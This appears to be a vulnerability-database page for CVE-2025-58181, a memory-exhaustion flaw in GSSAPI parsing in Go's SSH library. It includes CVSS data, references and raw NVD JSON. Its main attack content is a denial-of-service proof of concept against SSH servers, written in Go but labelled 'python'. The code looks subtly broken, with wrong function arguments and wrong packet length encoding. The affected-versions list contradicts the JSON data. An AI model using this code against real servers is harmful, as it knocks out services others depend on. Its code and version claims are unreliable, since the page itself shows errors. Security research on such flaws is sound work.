CVE-2025-58181

Description

SSH servers parsing GSSAPI authentication requests do not validate the number of mechanisms specified in the request, allowing an attacker to cause unbounded memory consumption.

CVSS Details

CVSS Score

5.3

Severity

MEDIUM

CVSS Vector

CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:L

Configurations (Affected Products)

cpe:2.3:a:golang:crypto:*:*:*:*:*:go:*:* - VULNERABLE

Go语言 golang.org/x/crypto/ssh < 修复版本

Go 1.22.x < 1.22.9

Go 1.23.x < 1.23.6

使用golang.org/x/crypto/ssh的SSH服务器（所有版本）

PoC / Exploit Code

⚠ For Security Research Only

The following code is for security research and authorized testing only.

python

package main

import (
    "fmt"
    "log"
    "net"
    "golang.org/x/crypto/ssh"
)

func main() {
    // Target SSH server configuration
    target := "target-server:22"
    
    // Create a large number of GSSAPI mechanisms to trigger memory exhaustion
    numMechanisms := 100000 // Large number to exhaust memory
    
    // Build malicious GSSAPI authentication request
    mechanisms := make([][]byte, numMechanisms)
    for i := range mechanisms {
        mechanisms[i] = []byte(fmt.Sprintf("malicious-mechanism-%d", i))
    }
    
    // Create GSSAPI init packet with many mechanisms
    // SSH GSSAPI init packet format: byte(SSH_MSG_USERAUTH_REQUEST), string(username), 
    // string(service), string("gssapi"), uint32(mechanism_count), mechanisms...
    config := &ssh.ClientConfig{
        User: "test",
        Auth: []ssh.AuthMethod{
            ssh.GSSAPIWithMICAuthMethod(mechanisms, "test-realm"),
        },
        HostKeyCallback: ssh.InsecureIgnoreHostKey(),
    }
    
    // Attempt to connect - this will trigger memory allocation for all mechanisms
    conn, err := ssh.Dial("tcp", target, config)
    if err != nil {
        log.Printf("Connection attempt completed: %v", err)
    } else {
        conn.Close()
    }
}

// Alternative raw packet PoC for testing:
func sendRawGSSAPIPoC(target string) error {
    // Connect to SSH server
    conn, err := net.Dial("tcp", target)
    if err != nil {
        return err
    }
    defer conn.Close()
    
    // SSH protocol version exchange (simplified)
    // ... (standard SSH banner exchange)
    
    // Build malicious GSSAPI authentication request packet
    // This PoC demonstrates the concept of sending excessive GSSAPI mechanisms
    maliciousPacket := buildMaliciousGSSAPIPacket()
    
    // Send the malicious packet
    _, err = conn.Write(maliciousPacket)
    return err
}

func buildMaliciousGSSAPIPacket() []byte {
    // Construct packet with excessive GSSAPI mechanisms
    // to trigger unbounded memory allocation
    numMechanisms := 50000
    
    packet := []byte{byte(ssh.UserAuthRequest)}
    packet = append(packet, []byte("test")...)
    packet = appendVarint(packet, 4) // service name length
    packet = append(packet, []byte("ssh-connection")...)
    packet = appendVarint(packet, 5) // "gssapi" length
    packet = append(packet, []byte("gssapi")...)
    
    // Add mechanism count
    packet = appendVarint(packet, uint64(numMechanisms))
    
    // Add many mechanism names
    for i := 0; i < numMechanisms; i++ {
        mechanismName := fmt.Sprintf("mech-%d", i)
        packet = appendVarint(packet, uint64(len(mechanismName)))
        packet = append(packet, []byte(mechanismName)...)
    }
    
    return packet
}

func appendVarint(data []byte, v uint64) []byte {
    for v > 0x7f {
        data = append(data, byte(v&0x7f|0x80))
        v >>= 7
    }
    data = append(data, byte(v))
    return data
}

References

[1] CVE.org https://www.cve.org/CVERecord?id=CVE-2025-58181
[2] NVD NIST https://nvd.nist.gov/vuln/detail/CVE-2025-58181
[3] CVE Details https://www.cvedetails.com/cve/CVE-2025-58181/
[4] VulDB https://vuldb.com/cve/CVE-2025-58181
[5] https://go.dev/cl/721961
[6] https://go.dev/issue/76363
[7] https://groups.google.com/g/golang-announce/c/w-oX3UxNcZA
[8] https://pkg.go.dev/vuln/GO-2025-4134

Raw JSON Data

JSON

{"cve": {"id": "CVE-2025-58181", "sourceIdentifier": "[email protected]", "published": "2025-11-19T21:15:50.850", "lastModified": "2025-12-11T19:29:24.900", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "SSH servers parsing GSSAPI authentication requests do not validate the number of mechanisms specified in the request, allowing an attacker to cause unbounded memory consumption."}], "metrics": {"cvssMetricV31": [{"source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:L", "baseScore": 5.3, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "NONE", "integrityImpact": "NONE", "availabilityImpact": "LOW"}, "exploitabilityScore": 3.9, "impactScore": 1.4}]}, "weaknesses": [{"source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-770"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:golang:crypto:*:*:*:*:*:go:*:*", "versionEndExcluding": "0.45.0", "matchCriteriaId": "0DB7D01D-5361-40FC-83A9-91A601A0321D"}]}]}], "references": [{"url": "https://go.dev/cl/721961", "source": "[email protected]", "tags": ["Patch"]}, {"url": "https://go.dev/issue/76363", "source": "[email protected]", "tags": ["Issue Tracking"]}, {"url": "https://groups.google.com/g/golang-announce/c/w-oX3UxNcZA", "source": "[email protected]", "tags": ["Mailing List"]}, {"url": "https://pkg.go.dev/vuln/GO-2025-4134", "source": "[email protected]", "tags": ["Vendor Advisory"]}]}}